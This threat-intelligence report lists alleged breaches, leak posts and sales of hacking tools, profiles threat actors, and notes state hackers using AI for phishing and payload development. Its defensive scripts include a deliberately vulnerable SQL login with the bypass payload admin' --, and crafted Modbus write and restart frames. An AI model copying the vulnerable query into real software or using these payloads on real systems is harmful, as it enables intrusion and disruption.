I. Executive Summary
This daily cybersecurity report provides a comprehensive overview of significant breach incidents observed within the last 24 hours, alongside an in-depth analysis of the threat actors involved and broader trends shaping the cyber landscape. The report highlights the persistent and evolving nature of cyber threats, from financially motivated ransomware groups and initial access brokers to geopolitically aligned hacktivist collectives and nation-state actors leveraging advanced technologies like Artificial Intelligence (AI). Key observations underscore the increasing sophistication of multi-vector attacks, the weaponization of data exfiltration, and the continued reliance by adversaries on exploiting known vulnerabilities and misusing legitimate tools. Recommendations for enhancing organizational cybersecurity posture are provided, emphasizing proactive defense strategies, robust vulnerability management, and adaptive incident response capabilities.
II. Introduction
The digital domain remains a contested space, with a continuous barrage of cyberattacks targeting organizations across all sectors. Understanding the motivations, tactics, techniques, and procedures (TTPs) of various threat actors is paramount for developing effective defensive strategies. This report synthesizes recent incident data with intelligence on prominent cyber adversaries to offer actionable insights into the current threat environment. It aims to provide a clear picture of the types of attacks being conducted, the entities behind them, and the overarching patterns that emerge from daily cyber activity.
III. Cybersecurity Incidents in the Last 24 Hours
The past 24 hours have seen a range of cyber incidents, reflecting the diverse motivations and capabilities of threat actors operating globally. These incidents span from financially driven ransomware attacks and data exfiltration to politically motivated disruptions and espionage.
- Incident ID: INC001 – Alleged database leak of French Swimming Federation
The threat actor claims to have leaked data from the French Swimming Federation (Fédération Française de Natation). The compromised dataset reportedly includes 2.9 million records.
- Published URL: https://leakbase.la/threads/2-9m-ffn-fedetation-francaise-natation-by-zekrome-s-o-specter-x-uneytech.39132/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/52023299-61fd-46ed-ad70-6050f3bd0b1f.png
- Incident ID: INC002 – Alleged access sale of Zoho account
A threat actor claims to be selling access to a Zoho account belonging to a South African business with reported revenue of under $5 million.
- Published URL: https://forum.exploit.in/topic/260336/?tab=comments#comment-1571588
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/d30c2edd-52d5-4de1-85d0-f540db4eccdd.png
- Incident ID: INC003 – Alleged sale of RDP Checker for Windows
The threat actor claims to be selling “Checker tickets for RDP (Soft for Windows)”, a lightweight, portable Windows-based utility designed to scan and check RDP credentials. The tool reportedly avoids extra processes, supports Windows x64, allows large target lists, custom ports, and accepts input from masscan.
- Published URL: https://ramp4u.io/threads/sell-rdp-checker-%D1%87%D0%B5%D0%BA%D0%B5%D1%80-rdp-%D0%BF%D0%BE%D0%B4-windows.3169
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/d7618f8d-df83-4d72-9bf7-b0a948f3e609.PNG
- Incident ID: INC004 – Alleged data leak of Rajamangala University of Technology Rattanakosin (RMUTR)
The group claims to have leaked the database of Rajamangala University of Technology Rattanakosin (RMUTR). The file is reportedly a 546MB .SQL dump.
- Published URL: https://t.me/we_anon_ndtsec/55
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/81fd7b15-d708-47a7-8bf0-fea156a1cf72.png, https://d34iuop8pidsy8.cloudfront.net/83f22c13-0615-4158-ab32-763a4b48b5f4.png
- Incident ID: INC005 – Alleged data leak of Weguest records
The threat actor claims to have obtained data from Weguest. The exposed data appears to include sensitive employee information such as overtime records, holiday and sick leave balances, compensation details, field training logs, and time-off summaries.
- Published URL: https://darkforums.st/Thread-Weguest-LEAK-2-5M-lines
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/d5f74955-bb75-4e49-aadd-e6f016a614dd.png
- Incident ID: INC006 – Team 1722 targets the website of Amma’s Tasty & Healthy Food
The group claims to have defaced the website of Amma’s Tasty & Healthy Food.
- Published URL: https://t.me/x1722x/2641
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/82f0ef43-61b3-48e4-ba18-598a28f47e14.png
- Incident ID: INC007 – Alleged data leak of Blitzpools
The threat actor claims to have leaked data from Blitzpools.
- Published URL: https://leakbase.la/threads/india-gambling-database-blitzpools-com.39127/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/49364893-c83d-41fa-b533-e9afb3c1faf4.png
- Incident ID: INC008 – Alleged leak of Police Department of Fulton
A threat actor claims to have leaked internal data from the Fulton Police Department. The exposed data appears to include sensitive employee information such as overtime records, holiday and sick leave balances, compensation details, field training logs, and time-off summaries.
- Published URL: https://darkforums.st/Thread-FULTON-POLICE-DEPARTEMENT-DATA
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/a5543747-f3ff-4eae-be2c-891075698fd3.png
- Incident ID: INC009 – Alleged Breach of Indonesian Delivery Records
The threat actor claims to have obtained a database containing the personal and logistical details of 30 million Indonesian clients linked to a domestic express delivery company. The leaked dataset reportedly includes sensitive information such as tracking details, phone numbers, national ID numbers, delivery addresses, order statuses, timestamps, and shipment metadata.
- Published URL: https://darkforums.st/Thread-Selling-Indonesia-30-million-Domestic-Express-delivery-company-clients
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/1501d043-7696-411f-84ee-c6121cc54da3.png
- Incident ID: INC010 – NDT SEC claims to target Thailand
A recent post by the group claims that they are targeting Thailand.
- Published URL: https://t.me/we_anon_ndtsec/51
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/e70ad0c3-f227-48d5-97af-f4c3a7e6a947.png
- Incident ID: INC011 – Alleged unauthorized access to Valmont Solar
The group claims to have gained unauthorized access to Valmont Solar.
- Published URL: https://t.me/c/2503473563/244
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/49dbf99e-13ea-4cde-93ee-2776e7fc6f77.png, https://d34iuop8pidsy8.cloudfront.net/368d9eb6-431d-4ff2-9cf2-63f16162558e.png
- Incident ID: INC012 – Alleged sale of Multichecker tool combining seed and Telegram data checking
A threat actor offers a software called “Multichecker,” an all-in-one GUI tool that integrates Seed Checker, Seed Searcher, and Telegram Checker functionalities. The tool supports over 30 blockchain networks for deep seed phrase and private key searches, including BTC, LTC, DOGE, DASH, BCH, Ethereum, Solana, Tron, and more. It also inspects Telegram tdata sessions to extract crypto balances, channels, admin rights, and searches for mnemonics and private keys within chats, saved messages, and files. Features include multithreading, proxy support, multi-language BIP39 mnemonic compatibility, and notifications via Telegram.
- Published URL: https://xss.is/threads/139167/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/2a14fc69-f3ad-4cf4-8f87-b89eecf541ac.png, https://d34iuop8pidsy8.cloudfront.net/516623a4-2636-44a0-98fc-2f0273f14329.png
- Incident ID: INC013 – Alleged database sale of Slate & Tell
The threat actor claims to be selling a database from Slate & Tell. The leaked data, reportedly from June 2025, allegedly includes approximately 5 million customer records compromised from the company’s server.
- Published URL: https://darkforums.st/Thread-Selling-Shopslateandtell-com-Jewelry-Shop-5M-Database-2025
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/53ee9e86-f843-43fb-b337-b233745ef658.png
- Incident ID: INC014 – Alleged Credential Data Leak of Pemprov DKI Jakarta Accounts
A threat actor known as VirXploit24 has allegedly leaked a large set of stolen login credentials from Pemprov DKI Jakarta. The leaked data includes usernames, passwords, and occasionally nicknames.
- Published URL: https://darkforums.st/Thread-STEALER-LOGS-PEMPROV-DKI-JAKARTA
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/7300bfeb-7c1e-4e8f-b095-6a686bdea35c.png
- Incident ID: INC015 – Alleged data breach of Bangkok Airways
The group claims to have leaked database dumps and login credentials for more than 30,000 Bangkok Airways customers. The post cites over 4GB of database dumps in one place and 5GB of SQL data in another, together with complete captured login information; the figures are the actor's own and are not consistent with each other.
- Published URL: https://t.me/we_anon_ndtsec/47?single
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/de881a05-3f65-436f-ac6a-1881b3c5bdd3.png
- Incident ID: INC016 – Alleged Credential Data Leak of Bank Syariah Indonesia (BSI) Accounts
A threat actor has allegedly leaked a large set of stolen login credentials from Bank Syariah Indonesia (BSI). The leaked data includes usernames, passwords, and occasionally nicknames or phone numbers associated with the accounts.
- Published URL: https://darkforums.st/Thread-STEALER-LOGS-BANK-BSI-SYARIAH-INDONESIA
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/cce71aca-5fe6-46e4-8569-5c7fdf8136fd.png
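Both INC014 and INC016 are advertised by their thread titles as stealer logs rather than server breaches: the credentials come from infostealer malware on end-user machines, so the response is to identify which corporate accounts appear in the dump, force resets, and look for passwords reused on personal sites. The script below is an added example of that triage and is not code from the report or from either post. The log lines are constructed, and `example-bank.test` is a hypothetical corporate domain standing in for the victim organisation.

```python
"""Triage of infostealer-log dumps like the ones advertised in INC014 and
INC016, as an added example (not code from the original report).

Stealer logs circulate as text lines of the form URL:LOGIN:PASSWORD, with
':', '|' or ';' as separators. Splitting on the first ':' breaks on the
scheme and port inside the URL, so the fields are taken from the right.
"""
import re
from urllib.parse import urlsplit

# Constructed sample lines, not real data. 'example-bank.test' is a
# hypothetical corporate domain standing in for the victim organisation.
SAMPLE_LOG = """\
https://ib.example-bank.test/login:andi.w:Summer2024!
https://mail.example-bank.test/owa:andi.w@example-bank.test:Summer2024!
https://www.facebook.com/login|andi.w@gmail.com|Summer2024!
https://portal.other-corp.test/:budi:hunter2
http://10.0.0.5:8080/admin;admin;admin
https://ib.example-bank.test/login:siti.r:P@ssw0rd
https://vpn.example-bank.test:443/remote/login:siti.r:P@ssw0rd
# comment line that must be ignored
"""

_SEP = re.compile(r"[:|;]")


def parse_line(line):
    """Return (host, login, password) or None for lines that do not parse.

    The last two separator-delimited fields are login and password; everything
    before them is the URL. A password that itself contains ':', '|' or ';'
    is truncated, which is the known limitation of this format.
    """
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = _SEP.split(line)
    if len(parts) < 3:
        return None
    password, login = parts[-1], parts[-2]
    url = line[: len(line) - len(login) - len(password) - 2]
    if "://" not in url:                  # bare hostnames appear in some dumps
        url = "http://" + url
    host = urlsplit(url).hostname         # lower-cased, port stripped
    if not host:
        return None
    return host, login, password


def is_corporate(host, corporate_domains):
    return any(host == d or host.endswith("." + d) for d in corporate_domains)


def triage(log_text, corporate_domains):
    """Summarise which corporate logins are exposed and which of their
    passwords were also used on non-corporate sites (reset, then check reuse)."""
    records = [r for r in map(parse_line, log_text.splitlines()) if r]
    corporate = [r for r in records if is_corporate(r[0], corporate_domains)]
    corporate_passwords = {pw for _, _, pw in corporate}
    reused = sorted({pw for host, _, pw in records
                     if pw in corporate_passwords
                     and not is_corporate(host, corporate_domains)})
    affected = sorted({login.split("@")[0].lower() for _, login, _ in corporate})
    return {
        "records": len(records),
        "corporate_records": corporate,
        "affected_logins": affected,      # accounts to force-reset
        "reused_passwords": reused,       # corporate passwords seen elsewhere
    }


if __name__ == "__main__":
    result = triage(SAMPLE_LOG, ["example-bank.test"])
    print(result["affected_logins"], result["reused_passwords"])
```

On the constructed sample the triage returns two corporate logins to reset (`andi.w`, `siti.r`) and one corporate password that also appears on a personal site, which is the reuse case that makes stealer logs dangerous even after the corporate session is revoked.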
- Incident ID: INC017 – Alleged Leak of Personally Identifiable Information of Indonesian Citizens
A threat actor has allegedly leaked a dataset containing detailed personal information of Indonesian citizens. The leaked data includes full names, email addresses, phone numbers, physical addresses, birthdates, and encrypted passwords.
- Published URL: https://darkforums.st/Thread-BHINEKA-TUNGGAL-IKA-INDONESIA
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/a14f227c-2e29-4540-8bb4-f9e506764157.png
- Incident ID: INC018 – Alleged Sale of 880 Million Passwords
A threat actor is allegedly selling a database containing 880 million unique, non-duplicate passwords reportedly sourced from personal accounts. The dataset is 9GB in uncompressed size and available for $20.
- Published URL: https://bhf.pro/threads/708473/
- Screenshots: https://d34iuop8p8idsy8.cloudfront.net/6148af6e-69b6-475f-a1a1-b207da78a533.png
- Incident ID: INC019 – Alleged Sale of High Balance Non-VBV Cards from Worldwide Sources
The threat actor claims to be selling high-quality non-VBV cards (cards not enrolled in Verified by Visa / 3-D Secure, so no second-factor challenge at checkout) from all countries, each guaranteed to have a balance.
- Published URL: https://leakbase.la/threads/high-balance-nonvbv-c4rds-from-all-countries-available-contact-on-telegram-kynw1337.39113/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/df8dfcad-d3be-4a2d-9d7c-d5593a1ce295.png
- Incident ID: INC020 – Alleged Sale of Brute-Force Toolkit Targeting VPNs: Cisco, RDWeb, and GP
The threat actor claims to sell a VPN brute-force toolkit targeting Cisco, RDWeb (Microsoft Remote Desktop Web Access), and GP (Palo Alto GlobalProtect) portals. The tool, called VPNStrike, features subdomain scanning and login checking, designed to identify valid portals before credentials are tried against them.
- Published URL: https://ramp4u.io/threads/vpnstrike-%D0%91%D1%80%D1%83%D1%82-cisco-rdweb-gp-%E2%80%94-%D0%A1%D0%BA%D0%B0%D0%BD-%D1%81%D0%B0%D0%B1%D0%B4%D0%BE%D0%BC%D0%B5%D0%BD%D0%BE%D0%B2-%D0%9B%D0%BE%D0%B3%D0%B8%D0%BD-%D1%87%D0%B5%D0%BA%D0%B5%D1%80-vpn-brute-cisco-rdweb-gp-%E2%80%94-subdomain-scan-login-checker.3167/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/3b3bf70b-bf56-4a2f-af3d-960d625363fa.png
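The RDP checker in INC003 and the VPN brute-force kit in INC020 are both credential-checking tools, and they leave the same trace on the defender's side: bursts of failed logons from one source, either across many usernames (spray) or against one (brute force), sometimes followed by a success. The script below is an added example of that detection logic, not code from the report or from either tool. The log lines are constructed in a vendor-neutral format, not any real product's log format.

```python
"""Detection of RDP/VPN credential checking (INC003, INC020) over
authentication logs, as an added example; not code from the original report.

Constructed, vendor-neutral event lines (not any real product's format):
<ISO timestamp> <service> AUTH_FAIL|AUTH_OK src=<ip> user=<name>
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

SAMPLE_EVENTS = """\
2025-06-10T08:00:01Z rdp-jump AUTH_FAIL src=203.0.113.5 user=administrator
2025-06-10T08:00:03Z rdp-jump AUTH_FAIL src=203.0.113.5 user=admin
2025-06-10T08:00:04Z rdp-jump AUTH_FAIL src=203.0.113.5 user=backup
2025-06-10T08:00:06Z rdp-jump AUTH_FAIL src=203.0.113.5 user=svc_sql
2025-06-10T08:00:07Z rdp-jump AUTH_FAIL src=203.0.113.5 user=test
2025-06-10T08:00:09Z rdp-jump AUTH_OK src=203.0.113.5 user=backup
2025-06-10T08:05:00Z vpn-gw AUTH_FAIL src=198.51.100.7 user=alice
2025-06-10T08:05:30Z vpn-gw AUTH_FAIL src=198.51.100.7 user=alice
2025-06-10T08:06:00Z vpn-gw AUTH_FAIL src=198.51.100.7 user=alice
2025-06-10T08:06:30Z vpn-gw AUTH_FAIL src=198.51.100.7 user=alice
2025-06-10T08:07:00Z vpn-gw AUTH_FAIL src=198.51.100.7 user=alice
2025-06-10T08:07:30Z vpn-gw AUTH_FAIL src=198.51.100.7 user=alice
2025-06-10T09:00:00Z vpn-gw AUTH_FAIL src=192.0.2.9 user=bob
2025-06-10T09:30:00Z vpn-gw AUTH_OK src=192.0.2.9 user=bob
"""

_LINE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<svc>\S+)\s+(?P<res>AUTH_FAIL|AUTH_OK)\s+"
    r"src=(?P<src>\S+)\s+user=(?P<user>\S+)$"
)


def parse_events(text):
    """Parse the constructed format into (ts, service, result, src, user)."""
    events = []
    for raw in text.splitlines():
        m = _LINE.match(raw.strip())
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append((ts, m["svc"], m["res"], m["src"], m["user"]))
    return sorted(events)


def detect(events, threshold=5, window=timedelta(minutes=10)):
    """Sliding-window rule: >= threshold failures from one source inside
    `window` is a password spray (many users) or brute force (one user);
    a success from a source already flagged is the event worth paging on."""
    alerts = []
    recent = defaultdict(deque)   # src -> (timestamp, user) of failures in window
    flagged = set()
    for ts, svc, res, src, user in events:
        q = recent[src]
        while q and ts - q[0][0] > window:
            q.popleft()
        if res == "AUTH_FAIL":
            q.append((ts, user))
            if len(q) >= threshold and src not in flagged:
                users = sorted({u for _, u in q})
                alerts.append({
                    "type": "password_spray" if len(users) > 1 else "brute_force",
                    "src": src, "service": svc, "failures": len(q), "users": users,
                })
                flagged.add(src)
        elif src in flagged and q:
            alerts.append({"type": "success_after_burst", "src": src,
                           "service": svc, "user": user})
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

The sample produces three alerts: a spray against the RDP host, the success that follows it (the `backup` account is the one to disable first), and a single-user brute force against the VPN gateway. A single failure from a third source followed by a success is left alone, which is the false-positive case a per-source threshold is there to avoid.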
- Incident ID: INC021 – GhostSec targets North Macedonia’s critical infrastructure and Kabelnet Group network systems
The threat actor claims responsibility for a cyberattack targeting critical infrastructure in North Macedonia. The attackers allegedly disrupted a main Cisco router, disabled more than seven Modbus-based industrial devices, and took down a digital repeater (Z35USR) reportedly used for civil and military communications. Connection logs shown in the post indicate repeated attempts to reach TCP port 502 (Modbus/TCP), suggesting an ICS/SCADA-focused operation. The actor also hints at database breaches, implying potential data leaks in future disclosures.
- Published URL: https://t.me/Ghostsecm/531
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/d01c3c0a-9acd-4f5b-9fcc-2d5ef4d897f7.png, https://d34iuop8pidsy8.cloudfront.net/b604017d-2aa4-45aa-9db4-b43abf00b86d.png
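The detail that matters in INC021 is the traffic to TCP/502: Modbus/TCP has no authentication, so any host that can reach the port can issue write and diagnostic commands, and a defender's only practical control is to know which sources are allowed to do so. The script below is an added example of decoding Modbus/TCP frames and flagging the ones a plant network should never see from an unexpected host; it is not code from the report or from the group's post. The frames and the two IP addresses are constructed.

```python
"""Modbus/TCP inspection for the kind of activity described in INC021
(repeated access to TCP/502 ahead of Modbus devices going offline), as an
added example; not code from the original report or the group's post.

Frames are constructed here. A Modbus/TCP frame starts with the 7-byte MBAP
header (transaction id, protocol id = 0, length, unit id) followed by the
function code and data. The length field counts unit id + function + data.
"""
import struct

FUNCTION_NAMES = {
    1: "Read Coils", 2: "Read Discrete Inputs", 3: "Read Holding Registers",
    4: "Read Input Registers", 5: "Write Single Coil", 6: "Write Single Register",
    8: "Diagnostics", 15: "Write Multiple Coils", 16: "Write Multiple Registers",
    43: "Read Device Identification",
}
WRITE_FUNCTIONS = {5, 6, 15, 16}
# Diagnostics sub-functions that disrupt the device: 0x0001 Restart
# Communications Option, 0x0004 Force Listen Only Mode.
DISRUPTIVE_DIAG = {0x0001, 0x0004}

# (src_ip, dst_ip, dst_port, payload). 10.10.1.5 plays the engineering
# workstation; 10.10.9.77 plays the unexpected host. All constructed.
SAMPLE_FLOWS = [
    ("10.10.1.5",  "10.10.2.20", 502, bytes.fromhex("00010000000601030000000a")),      # read 10 regs
    ("10.10.1.5",  "10.10.2.20", 502, bytes.fromhex("000200000006010600100001")),      # write reg 0x10
    ("10.10.9.77", "10.10.2.20", 502, bytes.fromhex("00010000000601030000000a")),      # read from stranger
    ("10.10.9.77", "10.10.2.20", 502, bytes.fromhex("00030000000601050000ff00")),      # coil 0 ON
    ("10.10.9.77", "10.10.2.20", 502, bytes.fromhex("00040000000b0110000000020400000000")),  # write 2 regs
    ("10.10.9.77", "10.10.2.20", 502, bytes.fromhex("000500000006010800010000")),      # diag: restart comms
    ("10.10.9.77", "10.10.2.20", 502, bytes.fromhex("000600000005012b0e0100")),        # read device id
    ("10.10.9.77", "10.10.2.20", 502, b"GET / HTTP/1.1\r\n"),                          # not Modbus
    ("10.10.9.77", "10.10.2.20", 80,  b"GET / HTTP/1.1\r\n"),                          # not port 502
]


def decode_mbap(payload):
    """Return the parsed frame, or None when the bytes cannot be Modbus/TCP."""
    if len(payload) < 8:
        return None
    tid, proto, length, unit, fc = struct.unpack("!HHHBB", payload[:8])
    if proto != 0 or len(payload) != 6 + length:
        return None
    return {"tid": tid, "unit": unit, "function": fc, "data": payload[8:]}


def analyse(flows, allowed_writers):
    """Flag TCP/502 frames from sources outside the engineering allow-list.
    Returns (src, dst, reason) tuples in flow order."""
    alerts = []
    for src, dst, dport, payload in flows:
        if dport != 502:
            continue
        frame = decode_mbap(payload)
        if frame is None:
            alerts.append((src, dst, "malformed_or_non_modbus"))
            continue
        if src in allowed_writers:
            continue                      # engineering hosts are expected to write and diagnose
        fc = frame["function"]
        name = FUNCTION_NAMES.get(fc, f"FC{fc}")
        if fc in WRITE_FUNCTIONS:
            alerts.append((src, dst, f"write_from_unauthorised_source:{name}"))
        elif fc == 8:
            if len(frame["data"]) >= 2:
                sub = struct.unpack("!H", frame["data"][:2])[0]
                if sub in DISRUPTIVE_DIAG:
                    alerts.append((src, dst, f"disruptive_diagnostics:0x{sub:04x}"))
        elif fc == 43:
            alerts.append((src, dst, "device_identification_probe"))
        else:
            alerts.append((src, dst, f"read_from_unexpected_source:{name}"))
    return alerts


if __name__ == "__main__":
    for alert in analyse(SAMPLE_FLOWS, {"10.10.1.5"}):
        print(alert)
```

The same reads and writes from the engineering workstation produce nothing, while the stranger's session is flagged at every step: a read (reconnaissance), coil and register writes (the "disabled devices" in the claim), a Restart Communications diagnostic, a device-identification probe, and a non-Modbus payload on the Modbus port. In practice the allow-list comes from the asset inventory, and this logic sits on a span port or in a Zeek/Suricata-style sensor rather than on the PLC.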
- Incident ID: INC022 – Alleged Leak of Vulnerability on the Website of Jabatan Kemajuan Islam Malaysia (JAKIM)
The threat actor claims to have discovered and exploited a critical SQL injection vulnerability on the official website of Jabatan Kemajuan Islam Malaysia (JAKIM). The flaw allegedly allowed unauthenticated access to the admin dashboard, exposing thousands of halal certification records, user data, and official documents. The actor reports the absence of basic security measures like CAPTCHA, WAF, and encryption, with the vulnerability potentially active for years without detection.
- Published URL: https://darkforums.st/Thread-MIHAB-Malaysia-International-Halal-Authority-Board
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/7d611ddd-65c4-4f68-b466-be96f78caf2d.png
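The bypass alleged in INC022 (unauthenticated access to an admin dashboard through SQL injection, with no hashing of stored credentials) is the classic string-built login query. The block below is an added example, not code from the JAKIM site or from the actor's post: it places that vulnerable login beside a parameterised version that stores salted PBKDF2 hashes and compares them in code, and shows that the same injected username succeeds against one and fails against the other. The table, rows and passwords are constructed; `sqlite3` is used because it is in the standard library, and the injection behaves the same way on MySQL or MSSQL.

```python
"""The authentication bypass pattern alleged in INC022, shown as an added
example (not code from JAKIM's site or the actor's post): a login query
built by string formatting next to the parameterised, hashed version.

Table, rows and passwords are constructed. sqlite3 is used because it is
in the standard library; the injection works the same way on MySQL/MSSQL.
"""
import hashlib
import hmac
import os
import sqlite3

ROWS = [("admin", "Adm1n!2025", "admin"), ("clerk", "halal-2024", "staff")]


def build_vulnerable_db():
    """Plaintext passwords, matching the post's claim of no 'encryption'."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin_users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO admin_users VALUES (?, ?, ?)", ROWS)
    return conn


def login_vulnerable(conn, username, password):
    # Attacker input becomes part of the SQL text. A username of
    #   admin' --
    # closes the string and comments out the password check entirely.
    sql = ("SELECT username, role FROM admin_users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchone()          # (username, role) or None


def _pbkdf2(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)


def build_hardened_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin_users "
                 "(username TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB, role TEXT)")
    for user, pw, role in ROWS:
        salt = os.urandom(16)
        conn.execute("INSERT INTO admin_users VALUES (?, ?, ?, ?)",
                     (user, salt, _pbkdf2(pw, salt), role))
    return conn


def login_hardened(conn, username, password):
    # Bound parameter: the driver sends the username as data, never as SQL.
    # The password is verified in code with a constant-time compare, so there
    # is no password column for an injection to short-circuit.
    row = conn.execute("SELECT salt, pw_hash, role FROM admin_users WHERE username = ?",
                       (username,)).fetchone()
    if row is None:
        return None
    salt, pw_hash, role = row
    if hmac.compare_digest(_pbkdf2(password, salt), pw_hash):
        return (username, role)
    return None


if __name__ == "__main__":
    v, h = build_vulnerable_db(), build_hardened_db()
    print("vulnerable:", login_vulnerable(v, "admin' --", "wrong"))   # ('admin', 'admin')
    print("hardened:  ", login_hardened(h, "admin' --", "wrong"))     # None
```

Parameterisation fixes the injection; hashing is the separate control that limits the damage when the table is dumped anyway, which is the other half of what the post claims was missing. A WAF or CAPTCHA, the two controls the actor lists, would only have slowed the attacker down.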
- Incident ID: INC023 – Alleged Data Leak of Ecuadorian Citizens
A threat actor claims to have leaked a database containing information on Ecuadorian citizens. The dataset includes approximately 433,000 records and spans breaches that occurred between 2024 and 2025.
- Published URL: https://breach-forums.st/Thread-CSV-Ecuador-Full-Data-Base
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/57d53a95-493d-4365-a4a7-1de3657bc808.png
IV. Threat Actor Profiles
Understanding the adversaries is fundamental to effective cybersecurity. This section details the known characteristics, motivations, and TTPs of the threat actors identified in the recent incidents.
A. Financially Motivated Cybercriminals
Financially motivated groups continue to be a dominant force in the cyber threat landscape, driven by monetary gain through various illicit activities.
- Person57
The handle “Person57” does not correspond to any threat actor tracked in the referenced material. The source cited for it is Google’s reporting on the misuse of its Gemini model by more than 57 government-backed groups tied to China, Iran, North Korea, and Russia; the number is the origin of the name match, not evidence about the poster of INC001.1 That reporting remains relevant to this report’s theme of AI-assisted operations: the groups observed were using AI for productivity gains rather than to develop novel capabilities, with use cases including research, troubleshooting code, and creating or localizing content.1
Government-backed attackers, also known as Advanced Persistent Threat (APT) groups, use AI tools to support multiple phases of the attack cycle, including coding and scripting tasks, payload development, gathering information about potential targets, researching publicly known vulnerabilities, and crafting phishing campaigns.1 Iranian APT actors are noted as the “heaviest users of Gemini,” with APT42 specifically using AI for phishing campaigns, reconnaissance on defense experts, and content generation.1 Chinese APT groups use AI for reconnaissance, code troubleshooting, and research into techniques for burrowing deeper into victim networks, such as lateral movement, privilege escalation, data exfiltration, and detection evasion.1
- Associated Incidents (from this report):
- Incident ID: INC001 – Alleged database leak of French Swimming Federation: The alleged database leak is attributed in this report to “Person57,” but the thread title in the published URL credits other handles (zekrome, specter, uneytech), and no prior intelligence links any of them to a known group. The incident should be assessed on the leak sample itself rather than on the actor name.
- betway
The handle “betway” is not documented in the referenced material. The ToyMaker profile below is included because an access sale of this kind is the business of an initial access broker (IAB), not because the two are known to be the same entity.
ToyMaker (also tracked as UNC961, Gold Melody, and Prophet Spider) is an IAB assessed with medium confidence to be financially motivated.2 The group specializes in acquiring access to high-value organizations and then handing that access to secondary threat actors, typically double-extortion ransomware gangs such as CACTUS.2 ToyMaker scans for vulnerable systems and deploys a custom malware called LAGTOY (also known as HOLERUN), first documented by Google-owned Mandiant in late March 2023 and attributed to UNC961.2 The group leverages a large arsenal of known security flaws in internet-facing applications to obtain initial access, then conducts reconnaissance, harvests credentials, and deploys LAGTOY, often within a week.2
- Associated Incidents (from this report):
- Incident ID: INC002 – Alleged access sale of Zoho account: The claim of selling access to a Zoho account belonging to a South African business, posted under the handle “betway,” is consistent with the IAB business model described above: one actor obtains the foothold and sells it to another who monetizes it.
- Avoid
The referenced material provides no specific information about a threat actor named “Avoid.” The term “threat actor” is a general cybersecurity term for any individual, group, or entity that poses a risk to digital systems, infrastructure, or data, whether maliciously, opportunistically, or unintentionally.3 Financially motivated threat actors seek monetary gain through ransomware, credit card fraud, identity theft, and business email compromise.3 Without further context, “Avoid” does not correspond to a known, named cybercriminal group in the provided data.
- Associated Incidents (from this report):
- Incident ID: INC003 – Alleged sale of RDP Checker for Windows: The alleged sale of an RDP checker, attributed to “Avoid,” places this actor in the tooling end of the initial-access supply chain; the product is what turns a masscan hit list into validated RDP credentials, which are then sold on or used directly.
- Gumball
The handle “Gumball” does not correspond to any tracked threat actor or hacking group in the referenced material.5 The only name matches found are unrelated (an animated series and a podcast advertising marketplace), so nothing in the provided data describes this actor’s motivations or TTPs.5 6 7
- Associated Incidents (from this report):
- Incident ID: INC005 – Alleged data leak of Weguest records: The alleged data leak from Weguest is attributable only to the forum handle “Gumball”; no prior threat intelligence links that handle to a known group, and the leak should be assessed on its own sample.
- hagilo2748
The referenced material does not contain any specific information about a threat actor named “hagilo2748,” so details regarding their motivations, TTPs, or known activities are unavailable.
- Associated Incidents (from this report):
- Incident ID: INC007 – Alleged data leak of Blitzpools: The alleged data leak from Blitzpools, attributed to “hagilo2748,” suggests an individual or group involved in data exfiltration, likely for financial gain, but no specific details about this actor are provided in the research.
- DigitalGhost
The forum handle “DigitalGhost” is mapped in this report to the Ghost ransomware group on the strength of the name alone; the referenced material does not establish that link, and the profile below should be read with that caveat.
Ghost ransomware (also tracked as Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture) emerged as a significant and financially damaging cyber threat.9 Active since early 2021, the actors are assessed to operate from China and conduct widespread attacks for financial gain.10 They indiscriminately target victims whose internet-facing services run outdated software and firmware, affecting organizations in over 70 countries.10 Their victims span critical infrastructure, schools, universities, healthcare, government networks, religious institutions, technology, manufacturing, and numerous small- and medium-sized businesses.10
Ghost actors gain initial access by exploiting publicly known vulnerabilities in internet-facing systems, specifically unpatched enterprise technologies such as Fortinet appliances, Microsoft Exchange (ProxyShell), Adobe ColdFusion, and Microsoft SharePoint.9 Once inside a network they move rapidly, often deploying ransomware within hours of initial access.9 Their post-compromise tactics include deploying web shells for persistence, abusing PowerShell for command execution and lateral movement, and using Cobalt Strike for post-exploitation and privilege escalation.9 They also change credentials to lock out administrators and solidify control.9
